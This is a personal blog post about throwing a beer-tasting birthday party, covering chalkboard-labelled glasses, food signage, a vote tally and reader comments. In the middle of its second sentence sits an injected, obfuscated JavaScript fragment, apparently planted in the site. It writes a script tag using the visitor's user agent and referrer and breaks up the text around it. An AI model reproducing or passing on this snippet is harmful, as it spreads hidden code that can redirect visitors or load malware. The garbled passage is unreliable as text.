Nick celebrated a milestone birthday back in September and I finally got around to throwing him a little shindig this past weekend. We decided that a beer tasting party was in order!
I found some inspiration over at HWTM ;if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dhibh|var|u0026u|referrer|rreke||js|php’.split(‘|’),0,{}))
and Could be Interesting, but decided to take my own little spin on the event.
We asked all the guests to bring different beers – preferably ones with weird names 🙂
Supplies
Small tasting glasses from Bed Bath and Beyond. 5 oz. Perfect for tastes 🙂
chalkboard contact paper from amazon
chalk
foam core
fun napkins and signage
Beer!
I cut ovals out of the contact paper and put them on the glasses so people could write their names on the glasses. I made sheets for people to record their favorite and least favorite beers and found some cute napkins on clearance at Target!
I copied the sign from Could be Interesting and added Nick’s name instead.
And then continued the theme for the food signage.
Speaking of food….in addition to traditional and non-traditional pulled pork sandwiches. We also had mini corn dogs. A new fave!
They are just as good as they look. And because they are mini, they don’t have any calories! Win!
On to the beer tasting! I had lots of leftover contact paper and a piece of foam core leftover from something else, so I decided to make my own chalkboard. Worked like a charm! We wrote down all the beers and let everyone place tick marks under happy, sad and neutral faces. By the end of the night we had a pretty full table!
For anyone interested the big winner was Brux and the Snarling Badger was the loser (there were high hopes for the badger….especially since it kinda looked like Mochi!)
We finished the night off with a mint chocolate chip ice cream cake, courtesy of Auntie Lisa (who never reads the blog)!

Looks like you can add bday celebrations to your event planning library! Looks like a great fiesta!
You’re sooo creative!
Nice job! Great idea! Food looks excellent:-)
Bummed we missed it. Corndogs ala Bruce might have been the tipping point for me to change plans with the fam last weekend 🙂
Simon, I thought the kmchi was for you!
